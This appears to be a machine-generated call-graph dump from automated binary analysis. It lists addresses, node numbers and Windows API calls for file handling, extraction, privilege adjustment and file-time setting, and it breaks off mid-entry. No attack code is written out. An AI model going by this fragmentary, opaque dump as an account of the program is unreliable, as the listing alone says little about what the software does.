40e144 MultiByteToWideChar 10683->10687 10689 405c3d 10683->10689 10685 405e07 10684->10685 10688 405df8 10684->10688 10686 40e115 WideCharToMultiByte 10685->10686 10686->10688 10687->10689 10690 405e29 FindFirstFileA 10688->10690 10691 405e5f FindNextFileA 10688->10691 10692 405ca2 FindNextFileW 10689->10692 10693 405c6e FindFirstFileW 10689->10693 10695 405e3d 10690->10695 10697 405e8a 10690->10697 10696 405e6c 10691->10696 10694 405caf 10692->10694 10698 405ccd 10693->10698 10715 405c82 10693->10715 10694->10698 10694->10715 10695->10715 10696->10697 10696->10715 10699 40e144 MultiByteToWideChar 10697->10699 10700 40e115 WideCharToMultiByte 10698->10700 10702 405eb8 10699->10702 10701 405cfb 10700->10701 10703 40e115 WideCharToMultiByte 10701->10703 10706 40df79 3 API calls 10702->10706 10704 405d41 10703->10704 10716 40df79 FileTimeToLocalFileTime FileTimeToSystemTime 10704->10716 10707 405f59 10706->10707 10709 40df79 3 API calls 10707->10709 10708 405d9d 10710 40df79 3 API calls 10708->10710 10711 405f6b 10709->10711 10712 405daf 10710->10712 10713 40df79 3 API calls 10711->10713 10714 40df79 3 API calls 10712->10714 10713->10715 10714->10715 10715->10659 10718 40dfd9 10716->10718 10717 40dfff SystemTimeToFileTime 10717->10708 10718->10717 10965 405097 10719->10965 10721 4047e3 10721->10667 10724 401357 10721->10724 10722 4051bd 10722->10721 10974 40348e 10722->10974 10983 40568a 10724->10983 10726 401376 10727 4013b0 10726->10727 10728 401397 10726->10728 10750 40137b 10726->10750 10994 403952 10727->10994 10729 4013ab 10728->10729 11009 4054ed 10728->11009 10733 401ce5 47 API calls 10729->10733 10735 401499 10733->10735 11003 401264 10735->11003 10736 4013c4 10738 40568a 35 API calls 10736->10738 10740 4013d7 10738->10740 10741 401437 10740->10741 10752 4054ed 32 API calls 10740->10752 10743 401485 10741->10743 10744 40146f 10741->10744 10742 4098f7 3 API calls 10745 4014b7 10742->10745 10743->10729 10749 40a205 ctype 2 API calls 10743->10749 10748 40a205 ctype 2 API calls 10744->10748 10744->10750 10747 40b2a9 15 API calls 10745->10747 10746 4014c1 10746->10750 11006 40a7e9 10746->11006 10747->10746 10748->10750 10749->10729 10750->10666 10754 40144c 10752->10754 10753 401ce5 47 API calls 10758 401582 10753->10758 10754->10741 10755 40568a 35 API calls 10754->10755 10755->10741 10756 401609 11014 40a810 10756->11014 10758->10753 10758->10756 10759 401264 32 API calls 10758->10759 10759->10758 10761 40554a 32 API calls 10760->10761 10762 4038e6 10761->10762 11068 40e0e1 GetSystemTime SystemTimeToFileTime 10762->11068 10766 401cf2 10765->10766 10767 404fdc 31 API calls 10766->10767 10769 401cfc 10767->10769 10768 401d72 11071 408d14 10768->11071 10769->10768 10772 40568a 35 API calls 10769->10772 10771 401ded 10774 401d56 10771->10774 10782 401df7 10771->10782 10773 401d51 10772->10773 10773->10774 10776 401da4 10773->10776 11088 402c96 10773->11088 11081 401b80 10774->11081 11094 402dbd 10776->11094 10779 401d6b 10779->10676 10780 401d99 10780->10776 10783 404f2e 30 API calls 10780->10783 10781 40a205 ctype 2 API calls 10781->10779 10784 401e43 10782->10784 10785 401e74 10782->10785 10783->10776 10786 4098f7 3 API calls 10784->10786 10789 408d14 39 API calls 10785->10789 10787 401e4f 10786->10787 10788 40b2a9 15 API calls 10787->10788 10804 401d5d 10788->10804 10815 401e9c 10789->10815 10790 4024c1 10791 4024fa 10790->10791 10792 4024df 10790->10792 10791->10779 10797 40a205 ctype 2 API calls 10791->10797 10794 4098f7 3 API calls 10792->10794 10793 40248a 10795 4098f7 3 API calls 10793->10795 10798 4024eb 10794->10798 10799 402495 10795->10799 10796 401ed1 10796->10790 10796->10793 10800 40a7e9 31 API calls 10796->10800 10797->10779 10801 40b2a9 15 API calls 10798->10801 10802 40b2a9 15 API calls 10799->10802 10803 40244e 10800->10803 10801->10804 10805 40249c 10802->10805 10806 404fdc 31 API calls 10803->10806 10804->10779 10804->10781 10807 404f2e 30 API calls 10805->10807 10808 402455 10806->10808 10807->10804 10809 4054ed 32 API calls 10808->10809 10811 402466 10809->10811 10812 40247c 10811->10812 11103 40574f 10811->11103 10813 40a810 32 API calls 10812->10813 10814 402484 10813->10814 10814->10790 10814->10793 10815->10796 10816 4020c0 10815->10816 10818 402147 10815->10818 10822 4020f1 10816->10822 11098 401708 10816->11098 10819 40e115 WideCharToMultiByte 10818->10819 10818->10822 10820 4021a3 CharToOemA 10819->10820 10820->10822 10822->10796 11102 40dba8 OemToCharA 10822->11102 10823 40238a 10824 4098f7 3 API calls 10823->10824 10825 402392 10824->10825 10826 40b2a9 15 API calls 10825->10826 10826->10796 10829 403a41 10827->10829 10828 403a77 10830 403b56 10828->10830 10839 403a7b ctype 10828->10839 10840 403aa5 10828->10840 10829->10828 10829->10839 11164 41126f 10829->11164 10832 403b91 OemToCharA 10830->10832 10830->10839 10833 403bb1 10832->10833 11106 402aee 10833->11106 10834 403afe 10835 403b06 10834->10835 10836 403b48 ctype 10834->10836 10835->10839 10841 41126f 53 API calls 10835->10841 10838 401264 32 API calls 10836->10838 10836->10839 10838->10839 10839->10676 10840->10834 10840->10836 11203 40382e 10840->11203 10842 403b22 10841->10842 10842->10839 10844 4054ed 32 API calls 10842->10844 10844->10839 10845 403bd1 10846 40e115 WideCharToMultiByte 10845->10846 10847 403c4d 10845->10847 10846->10847 10847->10839 10848 4054ed 32 API calls 10847->10848 10849 403d46 10848->10849 10849->10836 11112 40bb56 10849->11112 10852 402c96 2 API calls 10853 403dc2 10852->10853 10854 403dc6 10853->10854 10856 403df0 10853->10856 10855 40ae5a 13 API calls 10854->10855 10857 403dcd 10855->10857 10861 40da9a 3 API calls 10856->10861 10858 4098f7 3 API calls 10857->10858 10859 403ddc 10858->10859 10860 40ae5a 13 API calls 10859->10860 10860->10839 10862 403e68 10861->10862 10863 40e144 MultiByteToWideChar 10862->10863 10864 403eb1 10862->10864 10863->10864 10865 406045 11 API calls 10864->10865 10866 403fd0 10864->10866 10867 403fa1 10865->10867 10868 4098f7 3 API calls 10866->10868 10874 404032 10866->10874 10867->10866 11209 40e0b7 10867->11209 10870 404028 10868->10870 10872 40b2a9 15 API calls 10870->10872 10871 403fb7 10871->10866 11212 40e057 10871->11212 10872->10874 10873 40435c 10876 40bb56 20 API calls 10873->10876 10879 404345 10873->10879 10874->10873 10882 40422d 10874->10882 10886 404072 10874->10886 10875 4043f1 11143 409013 10875->11143 10876->10879 10879->10836 10879->10875 10880 405051 GetFileType 10879->10880 10881 4043c2 10880->10881 10881->10875 10883 4098f7 3 API calls 10881->10883 10882->10873 11120 404cf1 10882->11120 10885 4043d3 10883->10885 10888 40b2a9 15 API calls 10885->10888 10886->10839 10889 405898 5 API calls 10886->10889 10891 4043dd 10888->10891 10892 4040d9 10889->10892 10890 404478 10893 4044f2 10890->10893 10900 40451b 10890->10900 10901 40554a 32 API calls 10890->10901 11254 403471 10891->11254 10895 404186 10892->10895 11217 405767 10892->11217 10893->10900 11149 40551c 10893->11149 10895->10839 10902 4041c5 10895->10902 10897 40455d 10913 401264 32 API calls 10897->10913 10920 4045e5 10897->10920 10900->10897 10904 404591 10900->10904 10905 40457a 10900->10905 10901->10893 11229 405a5d 10902->11229 11269 411244 10904->11269 11259 4039b3 10905->11259 10907 4040f3 11223 4057bb 10907->11223 10908 404136 10911 4058ff 6 API calls 10908->10911 10909 4042b7 10909->10873 10917 4098f7 3 API calls 10909->10917 10915 404143 10911->10915 10913->10920 10916 405898 5 API calls 10915->10916 10918 404162 10916->10918 10921 4042dd 10917->10921 10918->10895 10925 40416c 10918->10925 10926 40418f 10918->10926 10919 4040fe 10919->10908 10922 404cf1 54 API calls 10919->10922 10924 4098f7 3 API calls 10920->10924 10928 404640 10920->10928 10923 40b2a9 15 API calls 10921->10923 10929 404132 10922->10929 10938 4042e7 10923->10938 10930 404636 10924->10930 10925->10895 10934 4057e8 3 API calls 10925->10934 10927 4098f7 3 API calls 10926->10927 10931 404199 10927->10931 10928->10836 10932 4046b2 10928->10932 11273 40503e SetEndOfFile 10928->11273 10929->10908 10933 40b2a9 15 API calls 10930->10933 10935 40b2a9 15 API calls 10931->10935 11156 4053c5 10932->11156 10933->10928 10934->10895 10935->10895 10941 4058ff 6 API calls 10938->10941 10939 4046f6 10940 404f2e 30 API calls 10939->10940 10944 404701 10940->10944 10942 404313 10941->10942 10943 404cf1 54 API calls 10942->10943 10945 404341 10943->10945 10944->10836 10946 4057e8 3 API calls 10944->10946 10945->10879 10947 4033db 18 API calls 10945->10947 10946->10836 10947->10873 10949 4076ad 10948->10949 10950 4076bc 10949->10950 11775 40da54 CompareStringA 10949->11775 10950->10667 10953 4077d0 10952->10953 10958 4077d6 10953->10958 11776 40da54 CompareStringA 10953->11776 10955 4077fe 10955->10958 11777 40da54 CompareStringA 10955->11777 10957 40792c 10957->10672 10958->10957 10959 40e144 MultiByteToWideChar 10958->10959 10959->10957 10961 4012aa ctype 2 API calls 10960->10961 10962 401b46 10961->10962 10963 4012aa ctype 2 API calls 10962->10963 10964 401b51 ctype 10963->10964 10966 4050ad 10965->10966 10967 406ea5 GetVersionExA 10966->10967 10968 4050ec 10967->10968 10969 405110 CreateFileA 10968->10969 10970 4050fc CreateFileW 10968->10970 10971 405124 10969->10971 10970->10971 10972 40517f 10971->10972 10973 40e115 WideCharToMultiByte 10971->10973 10972->10722 10973->10972 10977 4033ae 10974->10977 10978 4033b7 10977->10978 10979 4098f7 3 API calls 10978->10979 10980 4033cd 10979->10980 10981 40b2a9 15 API calls 10980->10981 10982 4033d4 10981->10982 10982->10721 10984 4056a2 10983->10984 10988 4056a7 10983->10988 10985 404fdc 31 API calls 10984->10985 10985->10988 10987 4056fa 10987->10726 10988->10987 10989 4056ef 10988->10989 10993 405704 10988->10993 11018 4052d2 10988->11018 11027 403456 10989->11027 10991 4054ed 32 API calls 10991->10993 10992 4052d2 3 API calls 10992->10993 10993->10987 10993->10991 10993->10992 11041 40a1ec GetProcessHeap RtlAllocateHeap 10994->11041 10996 4013bd 10999 404fdc SetFilePointer 10996->10999 10997 403960 10997->10996 10998 403443 30 API calls 10997->10998 10998->10996 11000 40501e 10999->11000 11001 405000 10999->11001 11000->10736 11001->11000 11042 40336d 11001->11042 11004 4054ed 32 API calls 11003->11004 11005 401277 11004->11005 11005->10742 11005->10746 11007 404fdc 31 API calls 11006->11007 11008 40a7fa 11007->11008 11008->10758 11050 405351 11009->11050 11012 405518 11012->10729 11013 40336d 30 API calls 11013->11012 11015 40a82c 11014->11015 11016 40a81f 11014->11016 11015->10750 11017 4054ed 32 API calls 11016->11017 11017->11015 11019 4052e5 GetStdHandle 11018->11019 11020 4052f8 ReadFile 11018->11020 11019->11020 11022 405311 11020->11022 11025 40532c 11020->11025 11032 405051 11022->11032 11024 405318 11024->11025 11026 4052d2 GetFileType 11024->11026 11025->10988 11026->11025 11036 403408 11027->11036 11030 40328f 30 API calls 11031 40346d 11030->11031 11031->10987 11033 405059 11032->11033 11034 40505c GetFileType 11032->11034 11033->11024 11035 405068 11034->11035 11035->11024 11037 4098f7 3 API calls 11036->11037 11038 403413 11037->11038 11039 40b2a9 15 API calls 11038->11039 11040 40341d 11039->11040 11040->11030 11041->10997 11043 403379 11042->11043 11049 40338f 11042->11049 11044 4098f7 3 API calls 11043->11044 11046 403387 11044->11046 11045 40328f 30 API calls 11047 40339b 11045->11047 11048 40b2a9 15 API calls 11046->11048 11047->11000 11048->11049 11049->11045 11051 4053b0 11050->11051 11053 40535e 11050->11053 11051->11012 11051->11013 11052 40538f SetFilePointer 11052->11051 11053->11052 11054 405381 11053->11054 11055 40537a 11053->11055 11059 40554a 11054->11059 11056 404fdc 31 API calls 11055->11056 11058 40537f 11056->11058 11058->11052 11060 40a7e9 31 API calls 11059->11060 11061 40555d 11060->11061 11062 4054ed 32 API calls 11061->11062 11063 40556a 11062->11063 11064 404fdc 31 API calls 11063->11064 11065 405571 11064->11065 11066 40a810 32 API calls 11065->11066 11067 40557d 11066->11067 11067->11058 11069 40df79 3 API calls 11068->11069 11070 40394c 11069->11070 11070->10676 11072 408d22 11071->11072 11073 408d7c 11071->11073 11075 401313 34 API calls 11072->11075 11080 408d57 11072->11080 11074 401313 34 API calls 11073->11074 11073->11080 11076 408d8a 11074->11076 11077 408d49 11075->11077 11078 40568a 35 API calls 11076->11078 11079 40568a 35 API calls 11077->11079 11078->11080 11079->11080 11080->10771 11082 40554a 32 API calls 11081->11082 11083 401b88 11082->11083 11084 4098f7 3 API calls 11083->11084 11087 401bc5 11083->11087 11085 401bbb 11084->11085 11086 40b2a9 15 API calls 11085->11086 11086->11087 11087->10804 11089 40bc5a 11088->11089 11090 40bc8f 11089->11090 11091 40bc84 IsWindowVisible 11089->11091 11093 40bc69 11089->11093 11092 40bc99 DialogBoxParamA 11090->11092 11090->11093 11091->11090 11092->11093 11093->10780 11096 402dd9 11094->11096 11097 402e56 11094->11097 11095 40e144 MultiByteToWideChar 11095->11097 11096->11095 11096->11097 11097->10768 11099 401711 11098->11099 11100 40171a 11098->11100 11101 401313 34 API calls 11099->11101 11100->10822 11101->11100 11102->10823 11104 40568a 35 API calls 11103->11104 11105 405762 11104->11105 11105->10811 11107 402b07 11106->11107 11111 402b6b 11107->11111 11274 402a9e 11107->11274 11109 402b30 11109->11111 11279 407046 11109->11279 11111->10845 11113 40bb61 11112->11113 11114 4098f7 3 API calls 11113->11114 11115 40bb6c 11114->11115 11305 40bb29 wvsprintfA 11115->11305 11118 40a82d 4 API calls 11119 403d92 11118->11119 11119->10839 11119->10852 11119->10856 11121 404d01 11120->11121 11122 405767 3 API calls 11121->11122 11137 404d18 11122->11137 11123 404e52 11124 404e61 11123->11124 11126 4051d8 4 API calls 11123->11126 11130 404292 11124->11130 11308 405b9b 11124->11308 11126->11124 11129 4058ff 6 API calls 11132 404ea4 11129->11132 11130->10873 11248 4033db 11130->11248 11131 405767 3 API calls 11131->11137 11133 404eb5 11132->11133 11134 404eab 11132->11134 11136 405866 3 API calls 11133->11136 11135 4051d8 4 API calls 11134->11135 11135->11130 11136->11130 11137->11123 11137->11130 11137->11131 11142 404d26 11137->11142 11343 404ab4 11137->11343 11140 404e76 11140->11123 11141 404e81 11141->11130 11142->11123 11142->11130 11142->11137 11142->11140 11142->11141 11311 404b4f 11142->11311 11336 40bb8a 11142->11336 11144 409024 11143->11144 11145 409046 11143->11145 11146 402dbd MultiByteToWideChar 11144->11146 11147 402dbd MultiByteToWideChar 11145->11147 11148 409044 11146->11148 11147->11148 11148->10890 11150 405351 32 API calls 11149->11150 11151 40552e 11150->11151 11152 405546 11151->11152 11350 40503e SetEndOfFile 11151->11350 11152->10900 11154 405539 11155 4054ed 32 API calls 11154->11155 11155->11152 11157 4053d7 11156->11157 11158 405416 11157->11158 11351 40de21 SystemTimeToFileTime 11157->11351 11160 405427 11158->11160 11161 40de21 2 API calls 11158->11161 11162 405436 SetFileTime 11160->11162 11163 40de21 2 API calls 11160->11163 11161->11160 11162->10939 11163->11162 11171 41127c 11164->11171 11165 4112fa 11166 404fdc 31 API calls 11165->11166 11167 411304 11166->11167 11168 41131b 11167->11168 11169 40554a 32 API calls 11167->11169 11170 404f2e 30 API calls 11168->11170 11169->11168 11175 411327 11170->11175 11171->11165 11172 4098f7 3 API calls 11171->11172 11173 4112f0 11172->11173 11174 40b2a9 15 API calls 11173->11174 11174->11165 11176 4077c1 2 API calls 11175->11176 11189 41137d 11176->11189 11178 411453 11364 40bd2a 11178->11364 11179 4114a5 11182 4098f7 3 API calls 11179->11182 11184 4114ac 11182->11184 11188 40b2a9 15 API calls 11184->11188 11185 411473 11372 402737 11185->11372 11186 4114e6 11187 401ce5 47 API calls 11186->11187 11194 41147b 11187->11194 11191 4114b9 11188->11191 11189->11179 11192 4077c1 2 API calls 11189->11192 11197 405097 CreateFileW CreateFileA GetVersionExA WideCharToMultiByte 11189->11197 11199 41144a 11189->11199 11354 41125e 11189->11354 11193 405097 4 API calls 11191->11193 11192->11189 11196 4114d1 11193->11196 11200 4054ed 32 API calls 11194->11200 11201 41151e 11194->11201 11195 4114df 11195->10828 11198 4054ed 32 API calls 11196->11198 11197->11189 11198->11195 11357 401851 11199->11357 11200->11201 11201->11195 11202 40554a 32 API calls 11201->11202 11202->11195 11204 403841 11203->11204 11205 403862 11203->11205 11204->11205 11391 403785 11204->11391 11206 403883 11205->11206 11407 40357e 11205->11407 11206->10834 11505 40e087 11209->11505 11211 40e0c3 11211->10871 11213 40e024 2 API calls 11212->11213 11214 40e065 11213->11214 11215 40e024 2 API calls 11214->11215 11216 40e070 11215->11216 11216->10866 11218 406ea5 GetVersionExA 11217->11218 11219 40576c 11218->11219 11220 405787 GetFileAttributesA 11219->11220 11222 40577e GetFileAttributesW 11219->11222 11221 4040ec 11220->11221 11221->10907 11221->10908 11222->11221 11224 406ea5 GetVersionExA 11223->11224 11225 4057c0 11224->11225 11226 4057db GetFileAttributesA 11225->11226 11228 4057d2 GetFileAttributesW 11225->11228 11227 4057e5 11226->11227 11227->10919 11228->11227 11230 406ea5 GetVersionExA 11229->11230 11232 405a6b 11230->11232 11231 405b8c 11231->10839 11232->11231 11233 4057bb 3 API calls 11232->11233 11234 405ab9 11233->11234 11235 405adb 11234->11235 11236 4057e8 3 API calls 11234->11236 11514 407374 11235->11514 11236->11235 11238 405aec CreateFileW 11238->11231 11239 405b10 11238->11239 11240 405b21 11239->11240 11241 40de21 2 API calls 11239->11241 11242 405b32 11240->11242 11243 40de21 2 API calls 11240->11243 11241->11240 11244 405b43 SetFileTime CloseHandle 11242->11244 11245 40de21 2 API calls 11242->11245 11243->11242 11244->11231 11246 405b80 11244->11246 11245->11244 11247 4057e8 3 API calls 11246->11247 11247->11231 11249 4033e4 11248->11249 11250 4098f7 3 API calls 11249->11250 11251 4033fa 11250->11251 11252 40b2a9 15 API calls 11251->11252 11253 403401 11252->11253 11253->10909 11518 403423 11254->11518 11257 40328f 30 API calls 11258 40348a 11257->11258 11258->10875 11260 403952 32 API calls 11259->11260 11261 4039c8 11260->11261 11523 4090ae 11261->11523 11263 403a23 11264 403a2e 11263->11264 11265 40a205 ctype 2 API calls 11263->11265 11264->10897 11265->11264 11267 4039d7 11267->11263 11268 4090ae 54 API calls 11267->11268 11532 409210 11267->11532 11268->11267 11270 41124b 11269->11270 11271 41125b 11270->11271 11574 410d74 11270->11574 11271->10897 11273->10932 11289 402981 11274->11289 11276 402aba 11276->11109 11278 402981 2 API calls 11278->11276 11280 40706e 11279->11280 11287 40713d 11279->11287 11286 407088 11280->11286 11300 406f2b 11280->11300 11283 40709e 11283->11109 11285 407122 11285->11283 11294 406f4d 11285->11294 11286->11283 11286->11285 11286->11287 11288 406f2b CompareStringA 11286->11288 11287->11283 11293 40da75 CompareStringA 11287->11293 11288->11287 11292 40298f 11289->11292 11290 4029bd 11290->11276 11290->11278 11291 407046 2 API calls 11291->11292 11292->11290 11292->11291 11293->11285 11296 406f56 11294->11296 11295 406ef6 CharUpperA 11295->11296 11296->11295 11297 406f90 11296->11297 11298 406fa1 11296->11298 11297->11283 11298->11297 11299 406f4d CharUpperA 11298->11299 11299->11298 11301 406f44 11300->11301 11303 406f3d 11300->11303 11304 40da75 CompareStringA 11301->11304 11303->11286 11304->11303 11306 40ad46 12 API calls 11305->11306 11307 40bb54 11306->11307 11307->11118 11309 4057e8 3 API calls 11308->11309 11310 404e9c 11309->11310 11310->11129 11312 404b5c 11311->11312 11313 406045 11 API calls 11312->11313 11315 404b80 11313->11315 11314 404cd9 ctype 11314->11142 11315->11314 11348 40da54 CompareStringA 11315->11348 11317 404bb9 11317->11314 11349 40da54 CompareStringA 11317->11349 11319 404bd4 11319->11314 11320 40a610 wvsprintfA 11319->11320 11321 405767 3 API calls 11319->11321 11322 404c27 11319->11322 11320->11319 11321->11319 11323 405767 3 API calls 11322->11323 11324 404c35 11323->11324 11324->11314 11325 404c6a MoveFileA 11324->11325 11325->11314 11326 404c84 11325->11326 11327 405767 3 API calls 11326->11327 11328 404c99 11327->11328 11329 404caf MoveFileA 11328->11329 11331 4051d8 4 API calls 11328->11331 11329->11314 11330 404cc3 11329->11330 11333 404f2e 30 API calls 11330->11333 11332 404cad 11331->11332 11332->11329 11334 404cce 11333->11334 11335 404fac 30 API calls 11334->11335 11335->11314 11337 40bb94 11336->11337 11338 40bbc8 DialogBoxParamA 11337->11338 11339 40bc44 SetFileAttributesA 11337->11339 11340 40bc3d 11337->11340 11341 40bbef DialogBoxParamA 11337->11341 11342 40bc0e 11337->11342 11338->11337 11339->11342 11340->11339 11341->11337 11341->11342 11342->11142 11346 404ac7 11343->11346 11344 40a610 wvsprintfA 11344->11346 11345 405767 3 API calls 11345->11346 11346->11344 11346->11345 11347 404ace 11346->11347 11347->11137 11348->11317 11349->11319 11350->11154 11352 40de79 11351->11352 11353 40de7c LocalFileTimeToFileTime 11351->11353 11352->11353 11353->11158 11379 40bd07 DialogBoxParamA 11354->11379 11356 411267 11356->11189 11358 401357 47 API calls 11357->11358 11359 40185d 11358->11359 11360 401872 11359->11360 11361 4098f7 3 API calls 11359->11361 11360->11178 11362 401868 11361->11362 11363 40b2a9 15 API calls 11362->11363 11363->11360 11365 40bd39 11364->11365 11366 4098f7 3 API calls 11365->11366 11367 40bd60 11366->11367 11368 40a610 wvsprintfA 11367->11368 11369 40bd6d 11368->11369 11380 40bcf7 11369->11380 11373 401ce5 47 API calls 11372->11373 11374 402744 11373->11374 11376 402783 11374->11376 11377 401264 32 API calls 11374->11377 11378 401ce5 47 API calls 11374->11378 11383 40ddca 11374->11383 11376->11194 11377->11374 11378->11374 11379->11356 11381 40bb29 13 API calls 11380->11381 11382 40bd02 11381->11382 11382->11185 11382->11186 11384 40ddd3 11383->11384 11385 40dddf 11383->11385 11389 40a6b0 GetTickCount 11384->11389 11390 40a6b0 GetTickCount 11385->11390 11388 40dde9 11388->11374 11389->11385 11390->11388 11392 406ea5 GetVersionExA 11391->11392 11393 403790 11392->11393 11394 403828 11393->11394 11431 402511 11393->11431 11394->11205 11396 4037b4 11406 403803 11396->11406 11466 4034aa 11396->11466 11399 40a205 ctype 2 API calls 11399->11394 11400 4037d4 SetFileSecurityW 11402 4037e8 11400->11402 11401 4037df SetFileSecurityA 11401->11402 11403 4098f7 3 API calls 11402->11403 11402->11406 11404 4037f9 11403->11404 11405 40b2a9 15 API calls 11404->11405 11405->11406 11406->11394 11406->11399 11408 40358b 11407->11408 11409 406ea5 GetVersionExA 11408->11409 11410 403590 11409->11410 11411 40e144 MultiByteToWideChar 11410->11411 11412 40365e ctype 11410->11412 11413 4035a7 11410->11413 11411->11413 11412->11206 11413->11412 11414 406045 11 API calls 11413->11414 11415 40369a 11414->11415 11416 4036b5 11415->11416 11417 4057e8 3 API calls 11415->11417 11418 40e115 WideCharToMultiByte 11416->11418 11417->11416 11419 4036cd 11418->11419 11497 405299 11419->11497 11422 402511 59 API calls 11423 403707 11422->11423 11424 403716 11423->11424 11426 404f2e 30 API calls 11423->11426 11425 40375b 11424->11425 11427 405097 4 API calls 11424->11427 11428 4057e8 3 API calls 11425->11428 11426->11424 11429 403736 11427->11429 11428->11412 11429->11425 11430 40373a SetFileTime 11429->11430 11430->11425 11432 40251e 11431->11432 11433 402533 11432->11433 11441 40255a 11432->11441 11434 4098f7 3 API calls 11433->11434 11435 40253d 11434->11435 11437 40b2a9 15 API calls 11435->11437 11436 4098f7 3 API calls 11438 402722 11436->11438 11440 402547 11437->11440 11439 40b2a9 15 API calls 11438->11439 11439->11440 11440->11396 11441->11440 11442 40fe4c 2 API calls 11441->11442 11461 402713 11441->11461 11443 4025b0 11442->11443 11444 410b78 34 API calls 11443->11444 11445 4025bc 11444->11445 11446 401708 34 API calls 11445->11446 11448 4025cf 11445->11448 11446->11448 11447 402638 11452 4026a2 11447->11452 11453 402699 11447->11453 11448->11447 11449 4026fb 11448->11449 11450 409013 MultiByteToWideChar 11448->11450 11475 41020a 11449->11475 11450->11447 11454 411244 59 API calls 11452->11454 11455 4039b3 59 API calls 11453->11455 11456 4026a0 11454->11456 11455->11456 11457 4026c5 11456->11457 11458 402708 11456->11458 11460 4098f7 3 API calls 11457->11460 11459 41020a 2 API calls 11458->11459 11459->11461 11462 4026d6 11460->11462 11461->11436 11463 40b2a9 15 API calls 11462->11463 11464 4026e0 11463->11464 11464->11449 11465 40dbcb 2 API calls 11464->11465 11465->11449 11467 403553 11466->11467 11468 4034bf GetCurrentProcess OpenProcessToken 11466->11468 11467->11400 11467->11401 11468->11467 11469 4034dd LookupPrivilegeValueA 11468->11469 11470 403509 AdjustTokenPrivileges 11469->11470 11471 40352b LookupPrivilegeValueA 11469->11471 11470->11471 11472 40351a 11470->11472 11473 403548 CloseHandle 11471->11473 11474 40353b AdjustTokenPrivileges 11471->11474 11472->11471 11473->11467 11474->11473 11476 410226 11475->11476 11477 410217 11475->11477 11478 41018e 2 API calls 11476->11478 11477->11476 11491 40a65b 11477->11491 11480 41022e 11478->11480 11481 4012aa ctype 2 API calls 11480->11481 11482 410239 11481->11482 11483 4012aa ctype 2 API calls 11482->11483 11484 410244 11483->11484 11485 4012aa ctype 2 API calls 11484->11485 11486 41024f 11485->11486 11494 407ae8 11486->11494 11492 40a205 ctype 2 API calls 11491->11492 11493 40a666 11492->11493 11493->11476 11495 40a65b ctype 2 API calls 11494->11495 11496 407af3 11495->11496 11498 4051d8 4 API calls 11497->11498 11499 4052aa 11498->11499 11501 4036f2 11499->11501 11502 40349c 11499->11502 11501->11422 11501->11424 11503 4033db 18 API calls 11502->11503 11504 4034a7 11503->11504 11504->11501 11510 40e024 11505->11510 11507 40e095 11508 40e024 2 API calls 11507->11508 11509 40e0a0 11508->11509 11509->11211 11511 40e030 11510->11511 11512 40e036 11510->11512 11511->11507 11513 40de21 2 API calls 11512->11513 11513->11511 11515 40737e 11514->11515 11516 407384 11515->11516 11517 40e144 MultiByteToWideChar 11515->11517 11516->11238 11517->11516 11519 4098f7 3 API calls 11518->11519 11520 40342e 11519->11520 11521 40b2a9 15 API calls 11520->11521 11522 403438 11521->11522 11522->11257 11524 409194 11523->11524 11530 4090cd 11523->11530 11526 4091c8 11524->11526 11538 408f88 11524->11538 11527 40ddca GetTickCount 11526->11527 11528 4091f9 11527->11528 11528->11267 11529 40568a 35 API calls 11529->11530 11530->11524 11530->11528 11530->11529 11531 41126f 53 API calls 11530->11531 11531->11530 11533 409240 11532->11533 11535 409229 11532->11535 11533->11535 11552 405585 11533->11552 11536 40ddca GetTickCount 11535->11536 11537 409278 11536->11537 11537->11267 11539 408f91 11538->11539 11541 408fed 11538->11541 11539->11541 11542 40b305 11539->11542 11541->11526 11547 40b283 11542->11547 11544 40b31a 11545 40a82d 4 API calls 11544->11545 11546 40b31f 11545->11546 11546->11541 11550 40a8f1 11547->11550 11551 40a8fe SendDlgItemMessageA 11550->11551 11551->11544 11553 40567f 11552->11553 11554 405596 11552->11554 11553->11535 11555 4055a9 GetStdHandle 11554->11555 11563 4055b2 11554->11563 11555->11563 11556 405601 WriteFile 11556->11563 11557 4055d7 11558 4055d9 WriteFile 11557->11558 11557->11563 11558->11557 11558->11563 11560 405672 11561 403471 30 API calls 11560->11561 11561->11553 11562 404fdc 31 API calls 11562->11563 11563->11553 11563->11556 11563->11557 11563->11558 11563->11560 11563->11562 11564 4054ed 32 API calls 11563->11564 11565 403304 11563->11565 11564->11563 11566 403313 11565->11566 11567 403367 11565->11567 11568 4098f7 3 API calls 11566->11568 11567->11563 11569 40331f 11568->11569 11570 40a610 wvsprintfA 11569->11570 11571 40332c 11570->11571 11572 4098f7 3 API calls 11571->11572 11573 403340 MessageBoxA SetLastError 11572->11573 11573->11567 11576 410d89 11574->11576 11575 410a90 2 API calls 11578 410df1 11575->11578 11576->11575 11591 410e16 11576->11591 11577 40e95b 54 API calls 11577->11591 11617 40e95b 11578->11617 11580 410ee2 11606 410748 11580->11606 11581 410748 44 API calls 11581->11591 11583 41121e 11583->11271 11585 411227 11654 40f9e1 11585->11654 11590 40ff05 54 API calls 11590->11591 11591->11577 11591->11580 11591->11581 11591->11583 11591->11585 11591->11590 11593 40fc8d 54 API calls 11591->11593 11594 410bbe 11591->11594 11630 410cb3 11591->11630 11650 41026d 11591->11650 11593->11591 11595 410bce 11594->11595 11596 403952 32 API calls 11595->11596 11601 410c31 11596->11601 11597 410c7c 11659 4102ca 11597->11659 11600 40e95b 54 API calls 11600->11601 11601->11597 11601->11600 11604 410ca1 11601->11604 11602 410c9a 11602->11591 11603 40a205 ctype 2 API calls 11603->11602 11604->11602 11605 40a205 ctype 2 API calls 11604->11605 11605->11602 11607 410a44 11606->11607 11612 410777 11606->11612 11608 40fb53 38 API calls 11607->11608 11610 410a52 11608->11610 11610->11583 11611 40faf1 36 API calls 11611->11612 11612->11607 11612->11610 11612->11611 11613 40fee6 GetProcessHeap RtlFreeHeap 11612->11613 11614 409210 38 API calls 11612->11614 11615 401708 34 API calls 11612->11615 11616 40dbcb GetProcessHeap RtlFreeHeap 11612->11616 11721 40fb53 11612->11721 11613->11612 11614->11612 11615->11612 11616->11612 11618 40e96d 11617->11618 11620 40e971 11617->11620 11618->11583 11618->11591 11621 40ff05 11618->11621 11619 4090ae 54 API calls 11619->11618 11620->11619 11622 40ff1e 11621->11622 11624 40ff23 11621->11624 11623 40e95b 54 API calls 11622->11623 11623->11624 11625 40ff68 ctype 11624->11625 11626 40ff49 11624->11626 11629 40ff63 11624->11629 11628 40e95b 54 API calls 11625->11628 11625->11629 11734 40fbea 11626->11734 11628->11625 11629->11591 11769 40fc8d 11630->11769 11633 410cd5 11633->11591 11634 410cf5 11637 410cec 11634->11637 11638 40fc8d 54 API calls 11634->11638 11635 